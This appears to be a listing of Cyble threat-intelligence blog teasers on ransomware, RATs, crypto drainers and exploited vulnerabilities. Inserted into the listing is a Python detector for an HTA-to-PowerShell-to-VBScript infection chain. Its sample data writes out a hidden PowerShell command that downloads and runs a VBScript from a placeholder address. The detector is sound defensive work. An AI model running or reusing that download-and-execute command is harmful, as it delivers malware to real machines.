LOCKBIT Black’s Legacy: Unraveling the DragonForce Ransomware Connection
Cyble Blog
by neetha871ad236bd
3d ago
Key Takeaways: Cyble Research & Intelligence Labs (CRIL) identified a DragonForce ransomware binary based on LOCKBIT Black ransomware, suggesting that the threat actors behind DragonForce used a leaked builder of LOCKBIT Black to generate their binary. In September 2022, an X (Twitter) user shared the download link for the LockBit ransomware builder, which allows threat actors to customize ransomware payloads according to their preferences. A comparison between binaries generated using the leaked LOCKBIT builder and the DragonForce ransomware revealed significa…
Threat Actor Profile: TransparentTribe
Cyble Blog
by neetha871ad236bd
1w ago
TransparentTribe primarily targets Indian government organizations, military personnel, and defense contractors. Its objective is usually to gather sensitive information, conduct cyber espionage, and compromise the security of its targets. TransparentTribe is known to have exploited various platforms, including Windows and Android, in its operations. The threat actors often create fake websites and documents that mimic legitimate government entities or organizations, which can trick targeted users into revealing credentials or downloading malware onto their systems. It has also u…
Critical D-Link NAS vulnerability under active exploitation
Cyble Blog
by neetha871ad236bd
2w ago
Cyble Global Sensor Intelligence observed active exploitation of a critical D-Link vulnerability. Recently, the security community has raised concerns regarding the vulnerabilities found in D-Link Network Attached Storage (NAS) devices. The vulnerabilities, identified as CVE-2024-3272 and CVE-2024-3273, were initially disclosed by an individual who goes by the alias "netsecfish" on GitHub on March 26, 2024. D-Link disclosed the same on April 4, 2024. The March 26 GitHub post highlighted that the malicious HTTP request is aimed at exploiting the vulnerable endpoint of affected D…
FatalRAT’s New Prey: Cryptocurrency Users in the Crosshairs
Cyble Blog
by neetha871ad236bd
2w ago
Key Takeaways: Cyble Research and Intelligence Labs (CRIL) has uncovered a novel phishing campaign tailored to cryptocurrency users. This campaign was deploying the well-known FatalRAT along with additional malware such as a Clipper and a Keylogger. The Threat Actors (TAs) orchestrating this campaign employ the DLL side-loading technique to load and execute the FatalRAT, Clipper, and Keylogger modules. FatalRAT is a Remote Access Trojan that provides attackers with control over the victim's computer and is equipped with extensive capabilities for stealing sensitive information. The inclusion of a clipp…
Solana Drainer’s Source Code Saga: Tracing Its Lineage to the Developers of MS Drainer
Cyble Blog
by neetha871ad236bd
1M ago
Key Takeaways: Threat actors (TAs) are actively exploiting platforms like Google Ads and social media platforms such as X (formerly Twitter) to disseminate crypto drainers, employing tactics such as compromising well-known accounts, creating counterfeit profiles, and using malicious advertisements. Cyble Research and Intelligence Labs (CRIL) found multiple drainer source codes leaked on cybercrime forums, including a recent leak of a Solana drainer's source code. The release of malware source code into the wild enables the creation of new variants. With multiple drainers' source cod…
WarzoneRAT Returns with Multi-Stage Attack Post FBI Seizure
Cyble Blog
by neetha871ad236bd
1M ago
Key Takeaways: In February, the FBI took down the WarzoneRAT malware operation, seizing its infrastructure and arresting two individuals linked to the cybercrime operation. Recently, Cyble Research and Intelligence Labs (CRIL) observed a few samples from a malware campaign, possibly distributed via tax-themed spam emails, deploying WarzoneRAT (Avemaria) as the final payload. In the first case, the compressed attachment contains a LNK file that downloads an HTA file, initiating a PowerShell command to download a VBScript file. This VBScript further downloads and executes the…
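The infection chain summarized above (LNK, then HTA, then PowerShell, then VBScript) maps directly onto a parent-child process pattern that endpoint telemetry records. The following is an added example, not code from the Cyble report, that matches that pattern over process-creation events. It assumes the usual Windows hosts for each stage (mshta.exe for the HTA, powershell.exe for the PowerShell command, wscript.exe or cscript.exe for the VBScript); the sample events, PIDs and the 198.51.100.7 address are constructed placeholders.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 / Security 4688 style)."""
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str


# Which host binary carries each stage of the chain in the summary: the HTA is
# run by mshta.exe, which launches PowerShell, which runs the VBScript.
# The stage -> executable mapping is an assumption of this example.
STAGES: List[Tuple[str, set]] = [
    ("hta", {"mshta.exe"}),
    ("powershell", {"powershell.exe", "pwsh.exe"}),
    ("vbscript", {"wscript.exe", "cscript.exe"}),
]
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(by_pid: Dict[int, ProcEvent], pid: int, max_depth: int = 16) -> List[ProcEvent]:
    """Walk parent links upward from pid; returns the chain root-first.
    Bounded so PID reuse or a cycle in incomplete telemetry cannot loop forever."""
    chain, seen = [], set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen and len(chain) < max_depth:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    chain.reverse()
    return chain


def stages_in_ancestry(by_pid: Dict[int, ProcEvent], pid: int) -> List[Tuple[str, ProcEvent]]:
    """Greedily match the stage order against the root-first ancestry. Gaps are
    allowed (an intermediate cmd.exe, say) but order is not: PowerShell only
    counts when an mshta.exe ancestor precedes it."""
    matched, idx = [], 0
    for ev in ancestry(by_pid, pid):
        if idx < len(STAGES) and basename(ev.image) in STAGES[idx][1]:
            matched.append((STAGES[idx][0], ev))
            idx += 1
    return matched


def scan(events: List[ProcEvent]) -> List[dict]:
    """One finding per mshta.exe-rooted chain that reached at least the PowerShell
    stage; 'complete' is True when the VBScript stage was also observed."""
    by_pid = {e.pid: e for e in events}
    best: Dict[int, dict] = {}   # keyed by the mshta pid; keep the longest match
    for ev in events:
        matched = stages_in_ancestry(by_pid, ev.pid)
        # Require HTA -> PowerShell, and that ev itself is the newest matched stage,
        # so each process is judged once and ancestors are not re-reported.
        if len(matched) < 2 or matched[-1][1].pid != ev.pid:
            continue
        hta_ev = matched[0][1]
        finding = {
            "hta_pid": hta_ev.pid,
            "stages": len(matched),
            "complete": len(matched) == len(STAGES),
            "remote_hta": bool(URL_RE.search(hta_ev.cmdline)),  # HTA fetched over HTTP
            "pids": [e.pid for _, e in matched],
            # explorer.exe as root fits a user double-clicking the LNK attachment
            "root": basename(ancestry(by_pid, ev.pid)[0].image),
        }
        prev = best.get(hta_ev.pid)
        if prev is None or finding["stages"] > prev["stages"]:
            best[hta_ev.pid] = finding
    return sorted(best.values(), key=lambda f: f["hta_pid"])


# Constructed sample telemetry (not from the Cyble report); 198.51.100.0/24 is
# a documentation address range used here as a placeholder.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(100, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    # Malicious: the LNK launches mshta against a remote HTA, then PowerShell, then wscript
    ProcEvent(210, 100, r"C:\Windows\System32\mshta.exe", "mshta.exe http://198.51.100.7/tax.hta"),
    ProcEvent(220, 210, PS, 'powershell -w hidden -c "iwr http://198.51.100.7/s.vbs '
                            '-OutFile $env:TEMP\\s.vbs; wscript $env:TEMP\\s.vbs"'),
    ProcEvent(230, 220, r"C:\Windows\System32\wscript.exe", r"wscript.exe C:\Users\u\AppData\Local\Temp\s.vbs"),
    # Benign: an admin's script runs a VBScript, but no mshta.exe is involved
    ProcEvent(300, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(310, 300, PS, r"powershell -File C:\scripts\backup.ps1"),
    ProcEvent(320, 310, r"C:\Windows\System32\cscript.exe", r"cscript //nologo C:\scripts\fixperms.vbs"),
    # Partial: a local HTA spawns PowerShell but never reaches a script host
    ProcEvent(400, 100, r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Users\u\Downloads\doc.hta"),
    ProcEvent(410, 400, PS, "powershell -c Get-Date"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Matching against the whole ancestry rather than a single parent-child pair keeps the rule robust to an intermediate cmd.exe and avoids flagging an administrator's PowerShell-launched script that has no mshta.exe ancestor. A URL on the mshta.exe command line is the higher-confidence variant, since that is how a downloaded HTA is typically invoked; a local .hta path still yields a partial finding worth triaging.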
CGSI Probes: ShadowSyndicate Group’s Possible Exploitation of Aiohttp Vulnerability (CVE-2024-23334)
Cyble Blog
by neetha871ad236bd
1M ago
CGSI captures potential exploitation of an Aiohttp vulnerability (CVE-2024-23334) by the ShadowSyndicate Group.
Xehook Stealer: Evolution of Cinoshi’s Project Targeting Over 100 Cryptocurrencies and 2FA Extensions
Cyble Blog
by neetha871ad236bd
1M ago
CRIL analyzes the Xehook stealer and its evolution from the Cinoshi project.
The Spreading Wave of Pig-Butchering Scams in India
Cyble Blog
by neetha871ad236bd
1M ago
Cyble analyzes the pig-butchering scam targeting Indian investors by distributing fake trading apps via the Google Play Store and the App Store.
JetBrains TeamCity Authentication Bypass vulnerability under Active Exploitation
Cyble Blog
by neetha871ad236bd
1M ago
Cyble Global Sensor Intelligence observes active exploitation of the JetBrains TeamCity authentication bypass vulnerability.